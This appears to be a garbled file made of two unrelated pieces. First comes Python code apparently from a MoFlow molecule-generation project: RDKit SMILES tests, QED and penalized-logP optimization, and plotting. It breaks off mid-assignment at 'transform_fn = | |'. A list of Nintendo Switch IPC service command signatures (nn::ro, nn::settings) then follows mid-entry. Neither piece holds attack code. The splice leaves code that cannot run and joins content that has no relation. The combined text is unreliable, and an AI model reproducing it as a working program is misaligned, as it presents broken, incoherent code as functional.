f.write('{},{},{},{}\n'.format(qed, plogp, smile, smile2))
f.flush()
f.close()
print('Dump done!')
print('Total: {}\t Invalid: {}\t bad_plogp: {} \t bad_qed: {}\n'.format(total, invalid, bad_plogp, bad_qed))
def test_smiles_to_tensor():
mol_smiles = 'CC(=O)c1ccc(S(=O)(=O)N2CCCC[C@H]2C)cc1' # 'CC(C)(C)c1ccc2occ(CC(=O)Nc3ccccc3F)c2c1' # 'CCOC1=C(N)OC=C1' #'CCC1COC(C)CO1' # 'CCC1=NNN=C1CC' #'CCCC1=C(O)C=CO1' # 'CCCCC1=NC=NN1' # 'CCCNC1=COC=C1' # or 'CCCNc1ccoc1' same results for smile # 'CCCNC1=COC=C1' #'CCCNC1=CC=CO1' #'CC1=C2C(=O)N(C)C12'
mm = Chem.MolFromSmiles(mol_smiles)
Chem.Kekulize(mm, clearAromaticFlags=True) # use this after mol from simles
print(Chem.MolToSmiles(mm)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=True)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=True)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=False)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=False)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
print('Chem.AddHs(mm)')
Chem.AddHs(mm)
Chem.SanitizeMol(mm, sanitizeOps=Chem.SanitizeFlags.SANITIZE_PROPERTIES)
print(Chem.MolToSmiles(mm)) # CC(=O)C1C=CC(=CC=1)S(=O)(=O)N1CCCCC1C
print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=True)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=True)) # CC(=O)C1C=CC(=CC=1)S(=O)(=O)N1CCCCC1C
print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=False)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=False)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
# atoms == atoms2 == atoms3
bond, atoms = smiles_to_adj('CC(=O)c1ccc(S(=O)(=O)N2CCCC[C@H]2C)cc1', 'zinc250k')
print(atoms.max(2)[1])
bond2, atoms2 = smiles_to_adj('CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1', 'zinc250k')
print(atoms2.max(2)[1], (bond == bond2).all(), (atoms == atoms2).all())
bond3, atoms3 = smiles_to_adj('CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1', 'zinc250k')
print(atoms3.max(2)[1], (bond == bond3).all(), (atoms == atoms3).all())
def test_property_of_smile_vs_tensor(data_name, atomic_num_list):
mol_smiles = 'COC1=CC=C(C2=CC(C3=CC=CC=C3)=CC(C3=CC=C(Br)C=C3)=[O+]2)C=C1' # 'CC(=O)c1ccc(S(=O)(=O)N2CCCC[C@H]2C)cc1' #'CC(C)(C)c1ccc2occ(CC(=O)Nc3ccccc3F)c2c1' # 'CCOC1=C(N)OC=C1' #'CCC1COC(C)CO1' # 'CCC1=NNN=C1CC' #'CCCC1=C(O)C=CO1' # 'CCCCC1=NC=NN1' # 'CCCNC1=COC=C1' # or 'CCCNc1ccoc1' same results for smile # 'CCCNC1=COC=C1' #'CCCNC1=CC=CO1' #'CC1=C2C(=O)N(C)C12'
mm = Chem.MolFromSmiles(mol_smiles)
plogp = env.penalized_logp(mm)
qed = env.qed(mm)
print('{}: plogp: {}\tqed: {}'.format(mol_smiles, plogp, qed))
adj, x = smiles_to_adj(mol_smiles, data_name=data_name)
rev_mol_smiles = adj_to_smiles(adj, x, atomic_num_list)
mm2 = Chem.MolFromSmiles(rev_mol_smiles[0])
plogp = env.penalized_logp(mm2)
qed = env.qed(mm2)
print('{}: plogp: {}\tqed: {}'.format(rev_mol_smiles[0], plogp, qed))
Chem.Kekulize(mm) # , clearAromaticFlags=True) # use this after mol from simles
plogp = env.penalized_logp(mm)
qed = env.qed(mm)
print('plogp: {}\tqed: {}'.format(plogp, qed))
mm3 = Chem.MolFromSmiles(Chem.MolToSmiles(mm))
plogp = env.penalized_logp(mm3)
qed = env.qed(mm3)
print('plogp: {}\tqed: {}'.format(plogp, qed))
print(Chem.MolToSmiles(mm)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=True)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=True)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=False)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=False)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
print('Chem.AddHs(mm)')
Chem.AddHs(mm)
# Chem.SanitizeMol(mm, sanitizeOps=Chem.SanitizeFlags.SANITIZE_PROPERTIES)
plogp = env.penalized_logp(mm)
qed = env.qed(mm)
print('plogp: {}\tqed: {}'.format(plogp, qed))
print(Chem.MolToSmiles(mm)) # CC(=O)C1C=CC(=CC=1)S(=O)(=O)N1CCCCC1C
print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=True)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=True)) # CC(=O)C1C=CC(=CC=1)S(=O)(=O)N1CCCCC1C
print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=False)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=False)) # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
# atoms == atoms2 == atoms3
bond, atoms = smiles_to_adj('COC1=CC=C(C2=CC(C3=CC=CC=C3)=CC(C3=CC=C(Br)C=C3)=[O+]2)C=C1', 'zinc250k')
print(atoms.max(2)[1])
bond2, atoms2 = smiles_to_adj('COC1C=CC(=CC=1)C1=CC(=CC(=[O+]1)C1C=CC(Br)=CC=1)C1C=CC=CC=1', 'zinc250k')
print(atoms2.max(2)[1], (bond == bond2).all(), (atoms == atoms2).all())
# bond3, atoms3 = smiles_to_adj('CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1', 'zinc250k')
# print(atoms3.max(2)[1], (bond==bond3).all(), (atoms==atoms3).all())
def find_top_score_smiles(model, device, data_name, property_name, train_prop, topk, atomic_num_list, debug):
start_time = time.time()
if property_name == 'qed':
col = 0
elif property_name == 'plogp':
col = 1
print('Finding top {} score'.format(property_name))
train_prop_sorted = sorted(train_prop, key=lambda tup: tup[col], reverse=True) # qed, plogp, smile
result_list = []
for i, r in enumerate(train_prop_sorted):
if i >= topk:
break
if i % 50 == 0:
print('Optimization {}/{}, time: {:.2f} seconds'.format(i, topk, time.time() - start_time))
qed, plogp, smile = r
results, ori = optimize_mol(model, property_model, smile, device, sim_cutoff=0, lr=.005, num_iter=100,
data_name=data_name, atomic_num_list=atomic_num_list,
property_name=property_name, random=False, debug=debug)
result_list.extend(results) # results: [(smile2, property, sim, smile1), ...]
result_list.sort(key=lambda tup: tup[1], reverse=True)
# check novelty
train_smile = set()
for i, r in enumerate(train_prop_sorted):
qed, plogp, smile = r
train_smile.add(smile)
mol = Chem.MolFromSmiles(smile)
smile2 = Chem.MolToSmiles(mol, isomericSmiles=True)
train_smile.add(smile2)
result_list_novel = []
for i, r in enumerate(result_list):
smile, score, sim, smile_original = r
if smile not in train_smile:
result_list_novel.append(r)
# dump results
f = open(property_name + '_discovered_sorted.csv', "w")
for r in result_list_novel:
smile, score, sim, smile_original = r
f.write('{},{},{},{}\n'.format(score, smile, sim, smile_original))
f.flush()
f.close()
print('Dump done!')
def constrain_optimization_smiles(model, device, data_name, property_name, train_prop, topk,
atomic_num_list, debug, sim_cutoff=0.0):
start_time = time.time()
if property_name == 'qed':
col = 0
elif property_name == 'plogp':
col = 1
print('Constrained optimization of {} score'.format(property_name))
train_prop_sorted = sorted(train_prop, key=lambda tup: tup[col]) #, reverse=True) # qed, plogp, smile
result_list = []
nfail = 0
for i, r in enumerate(train_prop_sorted):
if i >= topk:
break
if i % 50 == 0:
print('Optimization {}/{}, time: {:.2f} seconds'.format(i, topk, time.time() - start_time))
qed, plogp, smile = r
results, ori = optimize_mol(model, property_model, smile, device, sim_cutoff=sim_cutoff, lr=.005, num_iter=100,
data_name=data_name, atomic_num_list=atomic_num_list,
property_name=property_name, random=False, debug=debug)
if len(results) > 0:
smile2, property2, sim, _ = results[0]
plogp_delta = property2 - plogp
if plogp_delta >= 0:
result_list.append((smile2, property2, sim, smile, qed, plogp, plogp_delta))
else:
nfail += 1
print('Failure:{}:{}'.format(i, smile))
else:
nfail += 1
print('Failure:{}:{}'.format(i, smile))
df = pd.DataFrame(result_list,
columns=['smile_new', 'prop_new', 'sim', 'smile_old', 'qed_old', 'plogp_old', 'plogp_delta'])
print(df.describe())
df.to_csv(property_name+'_constrain_optimization.csv', index=False)
print('Dump done!')
print('nfail:{} in total:{}'.format(nfail, topk))
print('success rate: {}'.format((topk-nfail)*1.0/topk))
def plot_top_qed_mol():
import cairosvg
filename = 'qed_discovered_sorted_bytop2k.csv'
df = pd.read_csv(filename)
vmol = []
vlabel = []
for index, row in df.head(n=25).iterrows():
score, smile, sim, smile_old = row
vmol.append(Chem.MolFromSmiles(smile))
vlabel.append('{:.3f}'.format(score))
svg = Draw.MolsToGridImage(vmol, legends=vlabel, molsPerRow=5, #5,
subImgSize=(120, 120), useSVG=True) # , useSVG=True
cairosvg.svg2pdf(bytestring=svg.encode('utf-8'), write_to="top_qed2.pdf")
cairosvg.svg2png(bytestring=svg.encode('utf-8'), write_to="top_qed2.png")
# print('Dump {}.png/pdf done'.format(filepath))
# img = Draw.MolsToGridImage(vmol, legends=vlabel, molsPerRow=5,
# subImgSize=(300, 300), useSVG=True)
# print(img)
def plot_mol_constraint_opt():
import cairosvg
vsmiles = ['O=C(NCc1ccc2c3c(cccc13)C(=O)N2)c1ccc(F)cc1',
'O=C(NCC1=Cc2c[nH]c(=O)c3cccc1c23)c1ccc(F)cc1']
vmol = [Chem.MolFromSmiles(s) for s in vsmiles]
vplogp = ['{:.2f}'.format(env.penalized_logp(mol)) for mol in vmol]
# vhighlight = [vmol[0].GetSubstructMatch(Chem.MolFromSmiles('C2=C1C=CC=C3C1=C(C=C2)NC3')),
# vmol[1].GetSubstructMatch(Chem.MolFromSmiles('C4=CC6=C5C4=CC=CC5=C[N](=C6)[H]'))]
svg = Draw.MolsToGridImage(vmol, legends=vplogp, molsPerRow=2,
subImgSize=(250, 100), useSVG=True)
#highlightAtoms=vhighlight) # , useSVG=True
cairosvg.svg2pdf(bytestring=svg.encode('utf-8'), write_to="copt2.pdf")
cairosvg.svg2png(bytestring=svg.encode('utf-8'), write_to="copt2.png")
def plot_mol_matrix():
import cairosvg
import seaborn as sns
import matplotlib.pyplot as plt
smiles = 'CN(C)C(=N)NC(=N)N' #'CC(C)NC1=CC=CO1' #'CC1=C(SC(=C1)C(=O)NCC2=NOC=C2)Br'
bond, atoms = smiles_to_adj(smiles, 'qm9')
bond = bond[0]
atoms = atoms[0]
# def save_mol_png(mol, filepath, size=(100, 100)):
# Draw.MolToFile(mol, filepath, size=size)
Draw.MolToImageFile(Chem.MolFromSmiles(smiles), 'mol.pdf')
# save_mol_png(Chem.MolFromSmiles(smiles), 'mol.png')
svg = Draw.MolsToGridImage([Chem.MolFromSmiles(smiles)], legends=[], molsPerRow=1,
subImgSize=(250, 250), useSVG=True)
# highlightAtoms=vhighlight) # , useSVG=True
cairosvg.svg2pdf(bytestring=svg.encode('utf-8'), write_to="mol.pdf")
cairosvg.svg2png(bytestring=svg.encode('utf-8'), write_to="mol.png")
# sns.set()
# ax = sns.heatmap(1-atoms)
# with sns.axes_style("white"):
fig, ax = plt.subplots(figsize=(2, 3.4))
# sns.palplot(sns.diverging_palette(240, 10, n=9))
ax = sns.heatmap(atoms, linewidths=.5, ax=ax, annot_kws={"size": 18}, cbar=False,
xticklabels=False, yticklabels=False, square=True, cmap="vlag", vmin=-1, vmax=1, linecolor='black')
# ,cmap=sns.diverging_palette(240, 10, n=9)) #"YlGnBu" , square=True
plt.show()
fig.savefig('atom.pdf')
fig.savefig('atom.png')
for i, x in enumerate(bond):
fig, ax = plt.subplots(figsize=(5, 5))
# sns.palplot(sns.diverging_palette(240, 10, n=9))
ax = sns.heatmap(x, linewidths=.5, ax=ax, annot_kws={"size": 18}, cbar=False,
xticklabels=False, yticklabels=False, square=True, cmap="vlag", vmin=-1, vmax=1, linecolor='black')
# ,cmap=sns.diverging_palette(240, 10, n=9)) #"YlGnBu" , square=True
plt.show()
fig.savefig('bond{}.pdf'.format(i))
fig.savefig('bond{}.png'.format(i))
if __name__ == '__main__':
# plot_mol()
# plot_mol_constraint_opt()
# plot_mol_matrix()
# plot_top_qed_mol()
# exit(-1)
start = time.time()
print("Start at Time: {}".format(time.ctime()))
parser = argparse.ArgumentParser()
parser.add_argument("--model_dir", type=str, default='./results', required=True)
parser.add_argument("--data_dir", type=str, default='../data')
parser.add_argument('--data_name', type=str, default='qm9', choices=['qm9', 'zinc250k'],
help='dataset name')
parser.add_argument("--snapshot_path", "-snapshot", type=str, required=True)
parser.add_argument("--hyperparams_path", type=str, default='moflow-params.json', required=True)
parser.add_argument("--property_model_path", type=str, default=None)
# parser.add_argument('--molecule_file', type=str, default='qm9_relgcn_kekulized_ggnp.npz',
# help='path to molecule dataset')
parser.add_argument("--batch_size", type=int, default=256)
parser.add_argument('-l', '--learning_rate', type=float, default=0.001, help='Base learning rate')
parser.add_argument('-e', '--lr_decay', type=float, default=0.999995,
help='Learning rate decay, applied every step of the optimization')
parser.add_argument('-w', '--weight_decay', type=float, default=1e-5,
help='L2 norm for the parameters')
parser.add_argument('--hidden', type=str, default="",
help='Hidden dimension list for output regression')
parser.add_argument('-x', '--max_epochs', type=int, default=5, help='How many epochs to run in total?')
parser.add_argument('-g', '--gpu', type=int, default=0, help='GPU Id to use')
parser.add_argument("--delta", type=float, default=0.01)
parser.add_argument("--img_format", type=str, default='svg')
parser.add_argument("--property_name", type=str, default='qed', choices=['qed', 'plogp'])
parser.add_argument('--additive_transformations', type=strtobool, default=False,
help='apply only additive coupling layers')
parser.add_argument('--temperature', type=float, default=1.0,
help='temperature of the gaussian distributions')
parser.add_argument('--topk', type=int, default=500, help='Top k smiles as seeds')
parser.add_argument('--debug', type=strtobool, default='true', help='To run optimization with more information')
parser.add_argument("--sim_cutoff", type=float, default=0.00)
#
parser.add_argument('--topscore', action='store_true', default=False, help='To find top score')
parser.add_argument('--consopt', action='store_true', default=False, help='To do constrained optimization')
args = parser.parse_args()
# Device configuration
device = -1
if args.gpu >= 0:
# device = args.gpu
device = torch.device('cuda:' + str(args.gpu) if torch.cuda.is_available() else 'cpu')
else:
device = torch.device('cpu')
property_name = args.property_name.lower()
# chainer.config.train = False
snapshot_path = os.path.join(args.model_dir, args.snapshot_path)
hyperparams_path = os.path.join(args.model_dir, args.hyperparams_path)
model_params = Hyperparameters(path=hyperparams_path)
model = load_model(snapshot_path, model_params, debug=True) # Load moflow model
if args.hidden in ('', ','):
hidden = []
else:
hidden = [int(d) for d in args.hidden.strip(',').split(',')]
print('Hidden dim for output regression: ', hidden)
property_model = MoFlowProp(model, hidden)
# model.eval() # Set model for evaluation
if args.data_name == 'qm9':
atomic_num_list = [6, 7, 8, 9, 0]
transform_fn = | |
- 0 bytes out - OutObject<0,0>, InRaw<4,4,0>'),
('nn::ro::detail::IRoInterface', 0, '0x28 bytes in - 8 bytes out - takes pid - OutRaw<8,8,0>, InRaw<8,8,0>, InRaw<8,8,8>, InRaw<8,8,0x10>, InRaw<8,8,0x18>, InRaw<8,8,0x20>'),
('nn::ro::detail::IRoInterface', 1, '0x10 bytes in - 0 bytes out - takes pid - InRaw<8,8,0>, InRaw<8,8,8>'),
('nn::ro::detail::IRoInterface', 2, '0x18 bytes in - 0 bytes out - takes pid - InRaw<8,8,0>, InRaw<8,8,8>, InRaw<8,8,0x10>'),
('nn::ro::detail::IRoInterface', 3, '0x10 bytes in - 0 bytes out - takes pid - InRaw<8,8,0>, InRaw<8,8,8>'),
('nn::ro::detail::IRoInterface', 4, '8 bytes in - 0 bytes out - takes pid - InRaw<8,8,0>, InHandle<0,1>'),
('nn::sasbus::IManager', 0, '4 bytes in - 0 bytes out - OutObject<0,0>, InRaw<4,4,0>'),
('nn::sasbus::ISession', 0, ''),
('nn::sasbus::ISession', 1, ''),
('nn::sasbus::ISession', 2, ''),
('nn::sasbus::ISession', 3, '0 bytes in - 0 bytes out'),
('nn::settings::IFactorySettingsServer', 0, '0 bytes in - 6 bytes out - OutRaw<6,1,0>'),
('nn::settings::IFactorySettingsServer', 1, '0 bytes in - 0x1E bytes out - OutRaw<0x1E,1,0>'),
('nn::settings::IFactorySettingsServer', 2, '0 bytes in - 6 bytes out - OutRaw<6,2,0>'),
('nn::settings::IFactorySettingsServer', 3, '0 bytes in - 6 bytes out - OutRaw<6,2,0>'),
('nn::settings::IFactorySettingsServer', 4, '0 bytes in - 6 bytes out - OutRaw<6,2,0>'),
('nn::settings::IFactorySettingsServer', 5, '0 bytes in - 6 bytes out - OutRaw<6,2,0>'),
('nn::settings::IFactorySettingsServer', 6, '0 bytes in - 6 bytes out - OutRaw<6,1,0>'),
('nn::settings::IFactorySettingsServer', 7, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::IFactorySettingsServer', 8, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,0xA,0>'),
('nn::settings::IFactorySettingsServer', 9, '0 bytes in - 0x18 bytes out - OutRaw<0x18,1,0>'),
('nn::settings::IFactorySettingsServer', 10, '8 bytes in - 0 bytes out - InRaw<8,8,0>'),
('nn::settings::IFactorySettingsServer', 11, '8 bytes in - 0 bytes out - InRaw<8,8,0>'),
('nn::settings::IFactorySettingsServer', 12, '0 bytes in - 0x18 bytes out - OutRaw<0x18,1,0>'),
('nn::settings::IFactorySettingsServer', 14, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x180>'),
('nn::settings::IFactorySettingsServer', 15, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x240>'),
('nn::settings::IFactorySettingsServer', 16, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x134>'),
('nn::settings::IFactorySettingsServer', 17, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x804>'),
('nn::settings::IFactorySettingsServer', 18, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x134>'),
('nn::settings::IFactorySettingsServer', 19, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x400>'),
('nn::settings::IFactorySettingsServer', 20, '0 bytes in - 0x54 bytes out - OutRaw<0x54,4,0>'),
('nn::settings::IFactorySettingsServer', 21, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x244>'),
('nn::settings::IFactorySettingsServer', 22, '0 bytes in - 0x5A bytes out - OutRaw<0x5A,2,0>'),
('nn::settings::IFirmwareDebugSettingsServer', 2, '0 bytes in - 0 bytes out - Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>, Buffer<2,5,0>'),
('nn::settings::IFirmwareDebugSettingsServer', 3, '0 bytes in - 0 bytes out - Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>'),
('nn::settings::IFirmwareDebugSettingsServer', 4, '0 bytes in - 0 bytes out - OutObject<0,0>, Buffer<0,0x19,0x48>'),
('nn::settings::ISettingsItemKeyIterator', 0, '0 bytes in - 0 bytes out'),
('nn::settings::ISettingsItemKeyIterator', 1, '0 bytes in - 8 bytes out - OutRaw<8,8,0>'),
('nn::settings::ISettingsItemKeyIterator', 2, '0 bytes in - 8 bytes out - OutRaw<8,8,0>, Buffer<0,6,0>'),
('nn::settings::ISettingsServer', 0, '0 bytes in - 8 bytes out - OutRaw<8,1,0>'),
('nn::settings::ISettingsServer', 1, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,0xA,0>'),
('nn::settings::ISettingsServer', 3, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISettingsServer', 4, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 0, '8 bytes in - 0 bytes out - InRaw<8,1,0>'),
('nn::settings::ISystemSettingsServer', 1, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::settings::ISystemSettingsServer', 2, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>'),
('nn::settings::ISystemSettingsServer', 3, '0 bytes in - 0 bytes out - Buffer<0,0x1A,0x100>'),
('nn::settings::ISystemSettingsServer', 4, '0 bytes in - 0 bytes out - Buffer<0,0x1A,0x100>'),
('nn::settings::ISystemSettingsServer', 7, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 8, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 9, '0 bytes in - 0x28 bytes out - OutRaw<0x28,4,0>'),
('nn::settings::ISystemSettingsServer', 10, '0x28 bytes in - 0 bytes out - InRaw<0x28,4,0>'),
('nn::settings::ISystemSettingsServer', 11, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::settings::ISystemSettingsServer', 12, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>'),
('nn::settings::ISystemSettingsServer', 13, '0 bytes in - 0x10 bytes out - OutRaw<0x10,1,0>'),
('nn::settings::ISystemSettingsServer', 14, '0x10 bytes in - 0 bytes out - InRaw<0x10,1,0>'),
('nn::settings::ISystemSettingsServer', 15, '0 bytes in - 0x20 bytes out - OutRaw<0x20,8,0>'),
('nn::settings::ISystemSettingsServer', 16, '0x20 bytes in - 0 bytes out - InRaw<0x20,8,0>'),
('nn::settings::ISystemSettingsServer', 17, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 18, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 19, '4 bytes in - 8 bytes out - OutRaw<8,4,0>, InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 20, '0xC bytes in - 0 bytes out - InRaw<8,4,0>, InRaw<4,4,8>'),
('nn::settings::ISystemSettingsServer', 21, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>'),
('nn::settings::ISystemSettingsServer', 22, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::settings::ISystemSettingsServer', 23, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 24, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 25, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 26, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 27, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 28, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 29, '0 bytes in - 0x18 bytes out - OutRaw<0x18,4,0>'),
('nn::settings::ISystemSettingsServer', 30, '0x18 bytes in - 0 bytes out - InRaw<0x18,4,0>'),
('nn::settings::ISystemSettingsServer', 31, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>'),
('nn::settings::ISystemSettingsServer', 32, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::settings::ISystemSettingsServer', 35, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 36, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 37, '0 bytes in - 8 bytes out - OutRaw<8,8,0>, Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>'),
('nn::settings::ISystemSettingsServer', 38, '0 bytes in - 8 bytes out - OutRaw<8,8,0>, Buffer<2,6,0>, Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>'),
('nn::settings::ISystemSettingsServer', 39, '0 bytes in - 0x20 bytes out - OutRaw<0x20,4,0>'),
('nn::settings::ISystemSettingsServer', 40, '0x20 bytes in - 0 bytes out - InRaw<0x20,4,0>'),
('nn::settings::ISystemSettingsServer', 41, '0 bytes in - 0 bytes out - Buffer<0,0x1A,0x100>'),
('nn::settings::ISystemSettingsServer', 42, '0 bytes in - 0 bytes out - Buffer<0,0x19,0x100>'),
('nn::settings::ISystemSettingsServer', 43, '4 bytes in - 4 bytes out - OutRaw<4,4,0>, InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 44, '8 bytes in - 0 bytes out - InRaw<4,4,0>, InRaw<4,4,4>'),
('nn::settings::ISystemSettingsServer', 45, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 46, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 47, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 48, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 49, '0 bytes in - 8 bytes out - OutRaw<8,4,0>'),
('nn::settings::ISystemSettingsServer', 50, '8 bytes in - 0 bytes out - InRaw<8,4,0>'),
('nn::settings::ISystemSettingsServer', 51, '0 bytes in - 8 bytes out - OutRaw<8,8,0>'),
('nn::settings::ISystemSettingsServer', 52, '0 bytes in - 8 bytes out - OutRaw<8,8,0>'),
('nn::settings::ISystemSettingsServer', 53, '0 bytes in - 0x24 bytes out - OutRaw<0x24,1,0>'),
('nn::settings::ISystemSettingsServer', 54, '0x24 bytes in - 0 bytes out - InRaw<0x24,1,0>'),
('nn::settings::ISystemSettingsServer', 55, '0 bytes in - 8 bytes out - OutRaw<8,8,0>'),
('nn::settings::ISystemSettingsServer', 56, '0 bytes in - 8 bytes out - OutRaw<8,8,0>, Buffer<0,6,0>'),
('nn::settings::ISystemSettingsServer', 57, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 58, '0 bytes in - 0x20 bytes out - OutRaw<0x20,8,0>'),
('nn::settings::ISystemSettingsServer', 59, '0x20 bytes in - 0 bytes out - InRaw<0x20,8,0>'),
('nn::settings::ISystemSettingsServer', 60, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 61, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 62, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 63, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 64, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 65, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 66, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 67, '0 bytes in - 0x18 bytes out - OutRaw<0x18,1,0>'),
('nn::settings::ISystemSettingsServer', 68, '0 bytes in - 0x18 bytes out - OutRaw<0x18,1,0>'),
('nn::settings::ISystemSettingsServer', 69, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 70, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 71, '0 bytes in - 0xC bytes out - OutRaw<0xC,4,0>'),
('nn::settings::ISystemSettingsServer', 72, '0xC bytes in - 0 bytes out - InRaw<0xC,4,0>'),
('nn::settings::ISystemSettingsServer', 73, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 74, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 75, '0 bytes in - 0x20 bytes out - OutRaw<0x20,8,0>'),
('nn::settings::ISystemSettingsServer', 76, '0x20 bytes in - 0 bytes out - InRaw<0x20,8,0>'),
('nn::settings::ISystemSettingsServer', 77, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x80>'),
('nn::settings::ISystemSettingsServer', 78, '0 bytes in - 0 bytes out - Buffer<0,0x15,0x80>'),
('nn::settings::ISystemSettingsServer', 79, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 80, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 81, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 82, '0 bytes in - 0 bytes out - OutHandle<0,1>'),
('nn::settings::ISystemSettingsServer', 83, '0 bytes in - 0x10 bytes out - OutRaw<0x10,8,0>'),
